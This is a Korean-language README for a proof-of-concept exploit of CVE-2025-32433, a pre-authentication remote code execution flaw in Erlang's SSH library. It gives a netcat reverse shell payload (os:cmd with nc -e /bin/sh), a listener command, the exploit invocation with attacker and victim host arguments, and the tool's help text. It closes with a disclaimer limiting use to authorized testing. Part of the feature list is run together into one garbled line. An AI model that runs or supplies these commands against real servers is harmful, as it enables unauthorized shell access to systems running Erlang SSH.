
CVE-2025-32433에 대한 개념 증명(PoC) 익스플로잇으로, Erlang의 SSH 라이브러리에서 잘못된 SSH_MSG_CHANNEL_REQUEST 패킷을 통해 인증 전 코드 실행을 허용하는 심각한 취약점입니다.
CVE-2025-32433에 대한 개념 증명(PoC) 익스플로잇으로, Erlang SSH 라이브러리의 치명적인 취약점을 이용해 잘못된 형식의 SSH_MSG_CHANNEL_REQUEST 패킷을 통해 인증 전(pre-authentication) 코드 실행을 허용합니다.
argparse를 통한 내장 도움말 및 사용법os:cmd("nc LHOST LPORT -e /bin/sh").를 사용한 Erlang 스타일 리버스 셸 페이로드nc(Netcat) 리스너22)에 대한 네트워크 접근공격 머신에서 리스너를 시작합니다:
nc -lvnp 4444
익스플로잇을 실행합니다:
python3 CVE-2025-32433.py -lh [Attacker-IP] -lp [Attacker-Port] -rh [Victim-IP] -rp [Victim-Port]
셸이 리스너로 다시 연결될 때까지 기다립니다.
$ python3 CVE-2025-32433.py -h
usage: CVE-2025-32433.py [-h] -lh LHOST -lp LPORT [-rh RHOST] [-rp RPORT]
Send a pre-auth SSH channel request with an Erlang RCE payload
to get a reverse shell
optional arguments:
-h, --help show this help message and exit
-lh LHOST, --lhost LHOST
Local host/IP to receive the reverse shell
-lp LPORT, --lport LPORT
Local port to receive the reverse shell
-rh RHOST, --rhost RHOST
Target SSH server IP (default: 10.10.248.101)
-rp RPORT, --rport RPORT
Target SSH server port (default: 22)
이 코드는 본인이 소유했거나 명시적 테스트 허가를 받은 시스템에서만 사용하십시오. 취약점의 무단 악용은 불법이며 비윤리적입니다.